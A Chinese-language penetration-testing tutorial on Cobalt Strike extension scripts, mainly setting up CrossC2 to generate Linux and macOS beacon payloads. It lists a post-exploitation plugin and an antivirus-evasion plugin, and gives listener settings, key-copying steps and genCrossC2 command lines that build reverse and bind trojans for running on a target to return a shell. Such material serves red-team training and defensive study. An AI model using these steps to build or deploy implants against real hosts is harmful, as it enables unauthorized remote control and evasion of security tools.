渗透测试框架进阶-拓展应用

CobaltStrike扩展脚本

扩展脚本简介

扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能。

选择菜单栏的 CobaltStrike > Script Manager(脚本管理器) ,点击 Load(加 载) ,然后选择要使用的 .cna 扩展文件即可。

扩展脚本插件

后渗透插件:梼杌 https://github.com/XZVB12/taowu-cobalt-strike-en 
免杀插件:bypassAV https://github.com/cseroad/bypassAV 
上线linux主机:CrossC2 https://github.com/gloxec/CrossC2

CS上线Linux主机

CrossC2介绍

Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobaltstrike beacon payload 的跨平台项目。

支持 CobaltStrike 对其他平台(Linux/MacOS/…)的安全评估,及包含Unix后渗透模 块开发支持

CrossC2安装

https://github.com/gloxec/CrossC2/releases/

先下载工具脚本

下载 CrossC2.cna、genCrossC2、CrossC2Kit

修改CrossC2.cna配置

修改 $CC2_PATH 路径为下载的 genCrossC2 真实路径 (因为在windows上搞,所以用的windows的exe) 修改 $CC2_BIN 为使用的 genCrossC2 程序名字

创建Listener与拷贝Key

第一步:创建Listener监听器 windows/beacon_https/reverse_https 第二步:拷贝teamserver目录的 .cobaltstrike.beacon_keys 文件到本地客户端目录

一定要先执行第一步,不然上线不了

先进行监听器的创建。

把那个key的文件下载到自己本机的windows上的cs4.7的目录下

添加CNA扩展脚本

去刚刚下载的cc2的那个文件夹里面找到cna的文件,添加 CrossC2.cna进去脚本管理器中 (如果成功安装,菜单栏会多出一项 CrossC2 )

功能扩展

打开下载的 CrossC2Kit 文件夹,添加 CrossC2Kit_Loader.cna , 包含内存加 载等其它功能

cs4.x 版本文件管理、进程列表功能缺失,必须使用此Loader来重启

CrossC2 上线测试

GUI生成木马

默认使用 cli 或 cna 提供的GUI功能生成 beacon

反向的:CrossC2 > Create CrossC2 Listener > Create reverse HTTPS Listener 正向的: CrossC2 > Create CrossC2 Listener > Create bind TCP Listener

在日志文件中可以看见具体的操作命令,第一部分是win.exe的程序路径,第二个是vps的ip和监听的端口,第三个是keys的路径 ,后面是linux的平台和架构,最后是木马的文件名字。

生成的木马文件在自己客户端的cs4.7的文件夹下面。

执行木马

生成的out文件丢去linux上去添加执行权限,然后开始执行,成功上线。默认是交互是ssh的一个交互,但是操作的命令和windows的不同,所以可以通过help来查看可以执行的命令。

Cli 生成木马

windows的命令行那种去生成木马

反向:
./genCrossC2.Win.exe Listener-IP Listener-Port .cobaltstrike.beacon_keys null Linux x64 cc2-test

正向:(要在linux中执行,好像只有4.1-4.4才能这样搞)
./genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux-bind x64 cc

可以在win.exe的目录找到木马,然后丢上去目标机器执行,会反弹回来shell。

操作过程中要注意如下几点:

  1. 需要改 cna 脚本中 genCrossC2 路径。
  2. 要使用 windows/beacon_https/reverse_https 监听器。
  3. 要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。
  4. 文件都丢到 CS 客户端根目录下,别搞二级目录。
  5. 生成的 payload 是一个 Linux 下的可执行 payload 和可执行文件, IP 和端 口对应 windows/beacon_https/reverse_https 监听器。
经验分享 程序员 微信小程序 职场和发展